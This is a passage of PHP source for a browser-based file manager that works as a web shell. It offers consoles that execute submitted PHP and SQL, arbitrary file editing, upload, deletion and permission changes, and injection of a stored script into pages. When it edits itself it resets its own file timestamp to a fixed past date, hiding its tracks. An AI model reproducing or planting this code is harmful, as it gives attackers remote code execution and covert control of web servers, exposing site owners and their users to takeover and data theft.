    background-image: url("data:image/png;base64,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");

}


.file {
           
    background-image: url("data:image/png;base64,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");
}
<?=fm_home_style()?>

.img {
             
	                    background-image: 
url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAMAAAAoLQ9TAAAABGdBTUEAAK/INwWK6QAAAdFQTFRF7e3t/f39pJ+f+cJajV8q6enpkGIm/sFO/+2O393c5ubm/sxbd29yimdneFg65OTk2zoY6uHi1zAS1crJsHs2nygo3Nrb2LBXrYtm2p5A/+hXpoRqpKOkwri46+vr0MG36Ysz6ujpmI6AnzUywL+/mXVSmIBN8bwwj1VByLGza1ZJ0NDQjYSB/9NjwZ6CwUAsxk0brZyWw7pmGZ4A6LtdkHdf/+N8yow27b5W87RNLZL/2biP7wAA//GJl5eX4NfYsaaLgp6h1b+t/+6R68Fe89ycimZd/uQv3r9NupCB99V25a1cVJbbnHhO/8xS+MBa8fDwi2Ji48qi/+qOdVIzs34x//GOXIzYp5SP/sxgqpiIcp+/siQpcmpstayszSANuKKT9PT04uLiwIky8LdE+sVWvqam8e/vL5IZ+rlH8cNg08Ccz7ad8vLy9LtU1qyUuZ4+r512+8s/wUpL3d3dx7W1fGNa/89Z2cfH+s5n6Ojob1Yts7Kz19fXwIg4p1dN+Pj4zLR0+8pd7strhKAs/9hj/9BV1KtftLS1np2dYlJSZFVV5LRWhEFB5rhZ/9Jq0HtT//CSkIqJ6K5D+LNNblVVvjM047ZMz7e31xEG////tKgu6wAAAJt0Uk5T/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////wCVVpKYAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAANZJREFUKFNjmKWiPQsZMMximsqPKpAb2MsAZNjLOwkzggVmJYnyps/QE59eKCEtBhaYFRfjZuThH27lY6kqBxYorS/OMC5wiHZkl2QCCVTkN+trtFj4ZSpMmawDFBD0lCoynzZBl1nIJj55ElBA09pdvc9buT1SYKYBWw1QIC0oNYsjrFHJpSkvRYsBKCCbM9HLN9tWrbqnjUUGZG1AhGuIXZRzpQl3aGwD2B2cZZ2zEoL7W+u6qyAunZXIOMvQrFykqwTiFzBQNOXj4QKzoAKzajtYIQwAlvtpl3V5c8MAAAAASUVORK5CYII=");

}

@media screen and (max-width:720px){

  table{display:block;}

    #fm_table td{display:inline;float:left;}
    #fm_table tbody td:first-child{width:100%;padding:0;}

    #fm_table tbody tr:nth-child(2n+1){background-color:#EFEFEF;}
    #fm_table tbody tr:nth-child(2n){background-color:#DEE3E7;}
            
    #fm_table tr{display:block;float:left;clear:left;width:100%;}
	                    #header_table .row2, #header_table .row3 {display:inline;float:left;width:100%;padding:0;}

	                    #header_table table td {display:inline;float:left;}
}
</style>
        
</head>
            
<body>
<?php

$url_inc = '?fm=true';
if (isset($_POST['sqlrun'])&&!empty($fm_config['enable_sql_console'])){
	                    $res = empty($_POST['sql']) ? '' : $_POST['sql'];

	                    $res_lng = 'sql';

} elseif (isset($_POST['phprun'])&&!empty($fm_config['enable_php_console'])){
	                    $res = empty($_POST['php']) ? '' : $_POST['php'];

	                    $res_lng = 'php';
} 
        
if (isset($_GET['fm_settings'])) {
           
	                    echo ' 
             
<table class="whole">
                
<form method="post" action="">
                 
<tr><th colspan="2">'.__('File manager').' - '.__('Settings').'</th></tr>
           
'.(empty($msg_mx)?'':'<tr><td class="row2" colspan="2">'.$msg_mx.'</td></tr>').'

'.fm_config_checkbox_row(__('Show size of the folder'),'show_dir_size').'

'.fm_config_checkbox_row(__('Show').' '.__('pictures'),'show_img').'

'.fm_config_checkbox_row(__('Show').' '.__('Make directory'),'make_directory').'

'.fm_config_checkbox_row(__('Show').' '.__('New file'),'new_file').'
            
'.fm_config_checkbox_row(__('Show').' '.__('Upload'),'upload_file').'

'.fm_config_checkbox_row(__('Show').' PHP version','show_php_ver').'

'.fm_config_checkbox_row(__('Show').' PHP ini','show_php_ini').'

'.fm_config_checkbox_row(__('Show').' '.__('Generation time'),'show_gt').'

'.fm_config_checkbox_row(__('Show').' xls','show_xls').'
                 
'.fm_config_checkbox_row(__('Show').' PHP '.__('Console'),'enable_php_console').'

'.fm_config_checkbox_row(__('Show').' SQL '.__('Console'),'enable_sql_console').'
<tr><td class="row1"><input name="fm_config[sql_server]" value="'.$fm_config['sql_server'].'" type="text"></td><td class="row2 whole">SQL server</td></tr>

<tr><td class="row1"><input name="fm_config[sql_username]" value="'.$fm_config['sql_username'].'" type="text"></td><td class="row2 whole">SQL user</td></tr>
<tr><td class="row1"><input name="fm_config[sql_password]" value="'.$fm_config['sql_password'].'" type="text"></td><td class="row2 whole">SQL password</td></tr>
               
<tr><td class="row1"><input name="fm_config[sql_db]" value="'.$fm_config['sql_db'].'" type="text"></td><td class="row2 whole">SQL DB</td></tr>
                 
'.fm_config_checkbox_row(__('Show').' Proxy','enable_proxy').'
             
'.fm_config_checkbox_row(__('Show').' phpinfo()','show_phpinfo').'

'.fm_config_checkbox_row(__('Show').' '.__('Settings'),'fm_settings').'
                   
'.fm_config_checkbox_row(__('Restore file time after editing'),'restore_time').'

'.fm_config_checkbox_row(__('File manager').': '.__('Restore file time after editing'),'fm_restore_time').'
<tr><td class="row3"><a href="'.fm_url().'?fm_settings=true&fm_config_delete=true">'.__('Reset settings').'</a></td><td class="row3"><input type="submit" value="'.__('Save').'" name="fm_config[fm_set_submit]"></td></tr>

</form>
</table>

<table>

<form method="post" action="">
<tr><th colspan="2">'.__('Settings').' - '.__('Authorization').'</th></tr>

<tr><td class="row1"><input name="fm_login[authorize]" value="1" '.($auth_ok['authorize']?'checked':'').' type="checkbox" id="auth"></td><td class="row2 whole"><label for="auth">'.__('Authorization').'</label></td></tr>

<tr><td class="row1"><input name="fm_login[login]" value="'.$auth_ok['login'].'" type="text"></td><td class="row2 whole">'.__('Login').'</td></tr>
<tr><td class="row1"><input name="fm_login[password]" value="'.$auth_ok['password'].'" type="text"></td><td class="row2 whole">'.__('Password').'</td></tr>
<tr><td class="row1"><input name="fm_login[cookie_name]" value="'.$auth_ok['cookie_name'].'" type="text"></td><td class="row2 whole">'.__('Cookie').'</td></tr>
                   
<tr><td class="row1"><input name="fm_login[days_authorization]" value="'.$auth_ok['days_authorization'].'" type="text"></td><td class="row2 whole">'.__('Days').'</td></tr>

<tr><td class="row1"><textarea name="fm_login[script]" cols="35" rows="7" class="textarea_input" id="auth_script">'.$auth_ok['script'].'</textarea></td><td class="row2 whole">'.__('Script').'</td></tr>

<tr><td colspan="2" class="row3"><input type="submit" value="'.__('Save').'" ></td></tr>
</form>

</table>';
echo fm_tpl_form('php'),fm_tpl_form('sql');

} elseif (isset($proxy_form)) {

	                    die($proxy_form);

} elseif (isset($res_lng)) {	                    

?>

<table class="whole">
             
<tr>
    <th><?=__('File manager').' - '.$path?></th>

</tr>
<tr>

    <td class="row2"><table><tr><td><h2><?=strtoupper($res_lng)?> <?=__('Console')?><?php

	                    if($res_lng=='sql') echo ' - Database: '.$fm_config['sql_db'].'</h2></td><td>'.fm_run_input('php');

	                    else echo '</h2></td><td>'.fm_run_input('sql');
	                    ?></td></tr></table></td>

</tr>
                  
<tr>
    <td class="row1">
	                    	                    <a href="<?=$url_inc.'&path=' . $path;?>"><?=__('Back')?></a>

	                    	                    <form action="" method="POST" name="console">
	                    	                    <textarea name="<?=$res_lng?>" cols="80" rows="10" style="width: 90%"><?=$res?></textarea><br/>
	                    	                    <input type="reset" value="<?=__('Reset')?>">

	                    	                    <input type="submit" value="<?=__('Submit')?>" name="<?=$res_lng?>run">
                    
<?php

$str_tmpl = $res_lng.'_templates';

$tmpl = !empty($$str_tmpl) ? json_decode($$str_tmpl,true) : '';

if (!empty($tmpl)){
             
	                    $active = isset($_POST[$res_lng.'_tpl']) ? $_POST[$res_lng.'_tpl'] : '';

	                    $select = '<select name="'.$res_lng.'_tpl" title="'.__('Template').'" onchange="if (this.value!=-1) document.forms[\'console\'].elements[\''.$res_lng.'\'].value = this.options[selectedIndex].value; else document.forms[\'console\'].elements[\''.$res_lng.'\'].value =\'\';" >'."\n";
	                    $select .= '<option value="-1">' . __('Select') . "</option>\n";
                   
	                    foreach ($tmpl as $key=>$value){
            
	                    	                    $select.='<option value="'.$value.'" '.((!empty($value)&&($value==$active))?'selected':'').' >'.__($key)."</option>\n";
	                    }

	                    $select .= "</select>\n";

	                    echo $select;

}

?>

	                    	                    </form>
	                    </td>

</tr>

</table>

<?php

	                    if (!empty($res)) {
           
	                    	                    $fun='fm_'.$res_lng;

	                    	                    echo '<h3>'.strtoupper($res_lng).' '.__('Result').'</h3><pre>'.$fun($res).'</pre>';
             
	                    }
             
} elseif (!empty($_REQUEST['edit'])){

	                    if(!empty($_REQUEST['save'])) {

	                    	                    $fn = $path . $_REQUEST['edit'];

	                    	                    $filemtime = filemtime($fn);
                  
	                        if (file_put_contents($fn, $_REQUEST['newcontent'])) $msg_mx .= __('File updated');
	                    	                    else $msg_mx .= __('Error occurred');

	                    	                    if ($_GET['edit']==basename(__FILE__)) {
	                    	                    	                    touch(__FILE__,1415116371);
                   
	                    	                    } else {
	                    	                    	                    if (!empty($fm_config['restore_time'])) touch($fn,$filemtime);

	                    	                    }

	                    }

    $oldcontent = @file_get_contents($path . $_REQUEST['edit']);
    $editlink = $url_inc . '&edit=' . $_REQUEST['edit'] . '&path=' . $path;

    $backlink = $url_inc . '&path=' . $path;
                   
?>

<table border='0' cellspacing='0' cellpadding='1' width="100%">

<tr>

    <th><?=__('File manager').' - '.__('Edit').' - '.$path.$_REQUEST['edit']?></th>
        
</tr>
                 
<tr>
    <td class="row1">
                   
        <?=$msg_mx?>
	                    </td>
</tr>
<tr>

    <td class="row1">
        <?=fm_home()?> <a href="<?=$backlink?>"><?=__('Back')?></a>

	                    </td>

</tr>
                   
<tr>

    <td class="row1" align="center">

        <form name="form1" method="post" action="<?=$editlink?>">
            <textarea name="newcontent" id="newcontent" cols="45" rows="15" style="width:99%" spellcheck="false"><?=htmlspecialchars($oldcontent)?></textarea>
            <input type="submit" name="save" value="<?=__('Submit')?>">
                   
            <input type="submit" name="cancel" value="<?=__('Cancel')?>">

        </form>
    </td>
</tr>
</table>
                  
<?php

echo $auth_ok['script'];

} elseif(!empty($_REQUEST['rights'])){

	                    if(!empty($_REQUEST['save'])) {

	                        if(fm_chmod($path . $_REQUEST['rights'], fm_convert_rights($_REQUEST['rights_val']), @$_REQUEST['recursively']))

	                    	                    $msg_mx .= (__('File updated')); 
                   
	                    	                    else $msg_mx .= (__('Error occurred'));
         
	                    }

	                    clearstatcache();
    $oldrights = fm_rights_string($path . $_REQUEST['rights'], true);

    $link = $url_inc . '&rights=' . $_REQUEST['rights'] . '&path=' . $path;
    $backlink = $url_inc . '&path=' . $path;
              
?>
                   
<table class="whole">
<tr>

    <th><?=__('File manager').' - '.$path?></th>

</tr>
<tr>
    <td class="row1">

        <?=$msg_mx?>

	                    </td>
</tr>

<tr>

    <td class="row1">

        <a href="<?=$backlink?>"><?=__('Back')?></a>
                 
	                    </td>
                    
</tr>

<tr>
    <td class="row1" align="center">

        <form name="form1" method="post" action="<?=$link?>">
           <?=__('Rights').' - '.$_REQUEST['rights']?> <input type="text" name="rights_val" value="<?=$oldrights?>">
                
        <?php if (is_dir($path.$_REQUEST['rights'])) { ?>
            <input type="checkbox" name="recursively" value="1"> <?=__('Recursively')?><br/>
        <?php } ?>
                 
            <input type="submit" name="save" value="<?=__('Submit')?>">
        </form>

    </td>
</tr>
           
</table>
           
<?php

} elseif (!empty($_REQUEST['rename'])&&$_REQUEST['rename']<>'.') {

	                    if(!empty($_REQUEST['save'])) {

	                        rename($path . $_REQUEST['rename'], $path . $_REQUEST['newname']);
                 
	                    	                    $msg_mx .= (__('File updated'));

	                    	                    $_REQUEST['rename'] = $_REQUEST['newname'];
	                    }
         
	                    clearstatcache();

    $link = $url_inc . '&rename=' . $_REQUEST['rename'] . '&path=' . $path;
             
    $backlink = $url_inc . '&path=' . $path;


?>
<table class="whole">
<tr>

    <th><?=__('File manager').' - '.$path?></th>
            
</tr>
<tr>

    <td class="row1">
        <?=$msg_mx?>

	                    </td>
         
</tr>

<tr>

    <td class="row1">
                    
        <a href="<?=$backlink?>"><?=__('Back')?></a>
              
	                    </td>

</tr>

<tr>

    <td class="row1" align="center">

        <form name="form1" method="post" action="<?=$link?>">
            <?=__('Rename')?>: <input type="text" name="newname" value="<?=$_REQUEST['rename']?>"><br/>

            <input type="submit" name="save" value="<?=__('Submit')?>">
        </form>

    </td>

</tr>
                 
</table>
<?php

} else {
             
//Let's rock!

    $msg_mx = '';

    if(!empty($_FILES['upload'])&&!empty($fm_config['upload_file'])) {
         
        if(!empty($_FILES['upload']['name'])){
            $_FILES['upload']['name'] = str_replace('%', '', $_FILES['upload']['name']);

            if(!move_uploaded_file($_FILES['upload']['tmp_name'], $path . $_FILES['upload']['name'])){

                $msg_mx .= __('Error occurred');
              
            } else {

	                    	                    	                    	                    $msg_mx .= __('Files uploaded').': '.$_FILES['upload']['name'];

	                    	                    	                    }

        }
          
    } elseif(!empty($_REQUEST['delete'])&&$_REQUEST['delete']<>'.') {

        if(!fm_del_fileList(($path . $_REQUEST['delete']), true)) {
            $msg_mx .= __('Error occurred');

        } else {
           
	                    	                    	                    $msg_mx .= __('Deleted').' '.$_REQUEST['delete'];
	                    	                    }

